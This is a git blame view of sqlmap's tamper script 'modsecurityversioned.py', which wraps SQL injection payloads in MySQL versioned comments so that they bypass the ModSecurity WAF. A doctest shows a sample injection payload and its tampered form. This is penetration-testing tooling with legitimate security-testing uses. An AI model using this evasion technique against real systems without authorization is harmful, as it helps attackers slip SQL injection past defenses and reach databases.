Blame: tamper/modsecurityversioned.py - sqlmapproject/sqlmap

Automatic SQL injection and database takeover tool

36962 0 0 Python

Last preparations for DREI 2019-05-08 12:47:52 +02:00			`#!/usr/bin/env python`
added new tampering script by request 2011-10-19 22:07:23 +00:00
			`"""`
Year bump 2026-01-01 19:12:07 +01:00			`Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)`
Replacing doc/COPYING to LICENSE 2017-10-11 14:50:46 +02:00			`See the file 'LICENSE' for copying permission`
added new tampering script by request 2011-10-19 22:07:23 +00:00			`"""`

Fixes #2923 2018-02-10 11:06:31 +01:00			`import os`

minor update 2011-10-25 14:03:11 +00:00			`from lib.core.common import randomInt`
Minor refactoring 2018-02-08 16:49:16 +01:00			`from lib.core.common import singleTimeWarnMessage`
			`from lib.core.enums import DBMS`
added new tampering script by request 2011-10-19 22:07:23 +00:00			`from lib.core.enums import PRIORITY`

			`__priority__ = PRIORITY.HIGHER`

			`def dependencies():`
Minor refactoring 2018-02-08 16:49:16 +01:00			`singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))`
added new tampering script by request 2011-10-19 22:07:23 +00:00
Update for an Issue #12 2012-12-03 14:27:01 +01:00			`def tamper(payload, **kwargs):`
added new tampering script by request 2011-10-19 22:07:23 +00:00			`"""`
First commit related to the #3108 2018-07-31 01:17:11 +02:00			`Embraces complete query with (MySQL) versioned comment`
added new tampering script by request 2011-10-19 22:07:23 +00:00
			`Requirement:`
			`* MySQL`

			`Tested against:`
			`* MySQL 5.0`

			`Notes:`
Trivial text update 2018-12-28 17:54:58 +01:00			`* Useful to bypass ModSecurity WAF`
Another update for an Issue #352 and couple of fixes 2013-03-13 21:57:09 +01:00
			`>>> import random`
			`>>> random.seed(0)`
			`>>> tamper('1 AND 2>1--')`
Stabilizing DREI 2019-05-03 13:20:15 +02:00			`'1 /!30963AND 2>1/--'`
added new tampering script by request 2011-10-19 22:07:23 +00:00			`"""`

			`retVal = payload`

			`if payload:`
			`postfix = ''`
			`for comment in ('#', '--', '/*'):`
			`if comment in payload:`
			`postfix = payload[payload.find(comment):]`
			`payload = payload[:payload.find(comment)]`
			`break`
			`if ' ' in payload:`
minor update 2011-10-25 14:03:11 +00:00			`retVal = "%s /!30%s%s/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix)`
added new tampering script by request 2011-10-19 22:07:23 +00:00
Tamper function(s) refactoring (really no need for returning headers as they are passed by reference) 2012-10-25 10:10:23 +02:00			`return retVal`